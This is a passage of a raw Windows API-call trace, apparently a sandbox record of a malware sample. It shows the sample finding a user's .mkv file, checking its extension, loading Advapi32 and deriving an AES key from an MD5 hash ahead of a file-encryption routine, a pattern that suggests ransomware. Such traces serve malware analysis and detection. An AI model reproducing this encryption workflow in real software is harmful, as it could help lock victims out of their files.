HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30f21820, ftCreationTime.dwHighDateTime=0x1d5e6e1, ftLastAccessTime.dwLowDateTime=0xaa5959f0, ftLastAccessTime.dwHighDateTime=0x1d5e504, ftLastWriteTime.dwLowDateTime=0xaa5959f0, ftLastWriteTime.dwHighDateTime=0x1d5e504, nFileSizeHigh=0x0, nFileSizeLow=0x16b05, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Syi8lj9.mkv", cAlternateFileName="")) returned 0x90add8 [0199.682] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0199.682] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="58zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zBpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BpaZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="paZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZzgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zgTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gTTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TH\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Syi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yi8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i8lj9.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.684] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.684] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0199.684] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0199.684] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0199.684] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.684] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.685] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.685] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.685] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.685] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.mkv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30f21820, ftCreationTime.dwHighDateTime=0x1d5e6e1, ftLastAccessTime.dwLowDateTime=0xaa5959f0, ftLastAccessTime.dwHighDateTime=0x1d5e504, ftLastWriteTime.dwLowDateTime=0xaa5959f0, ftLastWriteTime.dwHighDateTime=0x1d5e504, nFileSizeHigh=0x0, nFileSizeLow=0x16b05, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="Syi8lj9.mkv", cAlternateFileName="")) returned 0x90af58 [0199.686] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0199.686] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.686] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0199.687] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.687] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.687] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0199.687] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.687] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0199.687] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.687] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.687] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0199.687] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.687] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.687] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.687] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.687] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.687] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0199.687] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.687] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0199.691] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.691] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.691] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0199.691] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.691] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.691] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.691] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.691] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.691] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0199.691] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.691] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.691] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.692] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.692] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.692] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.692] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0199.692] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.692] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.692] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0199.692] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.692] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.692] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0199.692] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.692] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.692] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0199.692] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.692] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.692] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.692] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.692] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.692] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.692] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.693] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0199.693] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.693] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.693] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0199.693] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.693] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.693] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.693] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.693] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0199.693] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.693] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.704] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.705] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.705] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.705] CryptHashData (hHash=0x90ae18, pbData=0x8df0a0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0199.705] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.705] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.705] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.705] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.705] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.705] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0199.705] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.705] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.705] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0199.705] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.705] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.705] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 